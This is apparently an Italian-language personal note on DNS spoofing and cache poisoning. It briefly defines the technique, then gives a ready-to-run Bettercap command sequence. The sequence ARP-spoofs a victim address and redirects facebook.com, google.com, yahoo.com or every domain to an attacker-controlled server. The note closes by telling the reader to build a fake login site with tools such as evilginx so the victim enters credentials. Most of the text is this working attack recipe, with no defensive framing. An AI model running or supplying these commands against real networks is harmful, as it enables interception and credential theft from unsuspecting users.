tags: DNS_spoofing sniffing active_sniffing


Il DNS Spoofing (o DNS Cache Poisoning nel caso si avveleni la cache di un server intermedio) è una tecnica con cui un attaccante fornisce risposte DNS false a una vittima, facendo credere che un certo nome di dominio corrisponda a un indirizzo IP controllato dall’attaccante, invece che a quello legittimo. Non funziona più molto bene a cause del maggiore utilizzo di HSTS e forzature ad utilizzare https, in ogni caso per poterlo eseguire possiamo utlizzare Bettercap:

sudo bettercap -iface wlan0
set arp.spoof.targets 192.168.1.105
set arp.spoof.fullduplex true
arp.spoof on
 
set dns.spoof.domains facebook.com,google.com,yahoo.com
set dns.spoof.address 192.168.1.100  # indirizzo del tuo fake server
dns.spoof on
#Quando la vittima digita `facebook.com`, verrà portata su `192.168.1.100` (cioè **il tuo web server** finto o clone).
 
#Puoi usare anche `*` come wildcard:
set dns.spoof.domains *

Contemporaneamente dovrai creare un sito fake nel quale far loggare la vittima, tramite python, apache, evilginx, ecc.